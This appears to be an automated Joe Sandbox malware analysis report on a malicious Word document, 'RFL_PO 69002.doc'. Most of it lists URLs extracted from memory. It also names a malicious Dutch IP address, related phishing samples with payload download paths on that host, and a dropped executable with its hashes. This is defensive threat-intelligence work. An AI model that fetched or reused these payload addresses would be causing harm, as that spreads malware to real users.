http://www.dailymail.co.uk/	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Virustotal		Browse
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe
http://search.orange.co.uk/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.dailymail.co.uk/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.fontbureau.com/designers	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://in.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://msk.afisha.ru/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://res.getmicrosoftkey.com/api/redemptionevents	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.msn.com/?ocid=iehpg	explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.hanafos.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buscar.ozu.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://graph.windows.net	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.ask.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.de/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://ncus.contentsync.	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0L	nothinglittle.exe.9.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://weather.service.msn.com/data.aspx	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/?ocid=iehp1	explorer.exe, 0000001D.00000000.462382336.000000000F747000.00000004.00000001.sdmp	false		high
http://google.pchome.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.sify.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://wus2.contentsync.	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.gmarket.co.kr/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.google.si/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.soso.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://outlook.office365.com/api/v1.0/me/Activities	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://clients.config.office.net/user/v1.0/android/policies	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://busca.orange.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp	false		high
http://www.target.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.orange.co.uk/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.centrum.cz/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://service2.bfast.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ariadna.elmundo.es/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://devnull.onenote.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.news.com.au/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.cdiscount.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.tiscali.it/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://it.search.yahoo.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.ceneo.pl/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.servicios.clarin.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://search.daum.net/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.kkbox.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
https://skyapi.live.net/Activity/	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.goo.ne.jp/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.msn.com/results.aspx?q=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://list.taobao.com/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.taobao.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ie.search.yahoo.com/os?command=	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.cnet.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
http://www.linternaute.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://visio.uservoice.com/forums/368202-visio-on-devices	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.amazon.co.uk/	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/embed?	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high
http://www.cdiscount.com/favicon.ico	explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp	false		high
https://augloop.office.com	26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.210.20.45	unknown	Netherlands		61157	PLUSSERVER-ASN1DE	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433026
Start date:	11.06.2021
Start time:	07:40:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RFL_PO 69002.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@8/13@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.8% (good quality ratio 3.7%) Quality average: 80.7% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 95% Number of executed functions: 49 Number of non-executed functions: 219
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 52.109.32.63, 52.109.12.23, 52.109.76.35, 40.88.32.150, 20.82.209.183, 23.218.208.56, 205.185.216.42, 205.185.216.10, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.210.154 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
07:41:40	API Interceptor	34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
31.210.20.45	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45/1xBet/Corf4olpp3.exe
	Swift MT103 Transfer.xlsx	Get hash	malicious	Browse	31.210.20.45/10/nanno1.exe
	IMG_1741000.xlsx	Get hash	malicious	Browse	31.210.20.45/10/11222.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	Payment Advice.pdf.doc	Get hash	malicious	Browse	31.210.20.45
	Quotation For Products.doc	Get hash	malicious	Browse	31.210.20.45
	RFL_PO 69002.doc	Get hash	malicious	Browse	31.210.20.45
	SKlGhwkzTi.exe	Get hash	malicious	Browse	151.106.118.75
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	BL & INV.doc	Get hash	malicious	Browse	31.210.20.45
	8cuLxttsra.exe	Get hash	malicious	Browse	31.210.21.161
	Owbtvvu.exe	Get hash	malicious	Browse	31.210.20.60
	Inqquuirrryyy202106079768900100.exe	Get hash	malicious	Browse	31.210.21.188
	Swift MT103 Transfer.xlsx	Get hash	malicious	Browse	31.210.20.45
	inqqqqquiry9867120210406000900.exe	Get hash	malicious	Browse	31.210.21.188
	tzeEeC2CBA.exe	Get hash	malicious	Browse	151.106.118.75
	IMG_1741000.xlsx	Get hash	malicious	Browse	31.210.20.45
	QyKNw7NioL.exe	Get hash	malicious	Browse	151.106.118.75
	fMWJqYA8ae.exe	Get hash	malicious	Browse	151.106.118.75
	Compliance - Notice 06-03.xlsx	Get hash	malicious	Browse	151.106.118.75
	Request for Courtesy Call - Urgent.xlsx	Get hash	malicious	Browse	151.106.118.75
	Payment Advice Reference No SWT005262021.exe	Get hash	malicious	Browse	31.210.20.60
	Payment Advice Reference0000 docx.exe	Get hash	malicious	Browse	31.210.20.60

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nothinglittle.exe.log Download File
Process:	C:\Users\Public\Documents\nothinglittle.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\26C2BCD2-E8F6-49A5-B037-8B38394825D2 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.3691107417870905
Encrypted:	false
SSDEEP:	1536:IcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:QEQ9DQW+ziXOe
MD5:	7C76C23A4308BEA58E3FD506F8D83B61
SHA1:	413E1AFC6D4095B690532A786941A56CB76980FD
SHA-256:	D72722CF884CB8E99725E39C9EDF3E641DF452CF65B1170822715ECFCD9D1A12
SHA-512:	907EA8015B03F560643590F88C21D4817A442EDB59C6CC2DD0BB1A29AC5C14135D6A727E96CA9E71C4CECFBAD73C4A506AC3121D809165D40C8F5CFAD1ECDEED
Malicious:	false
Reputation:	low
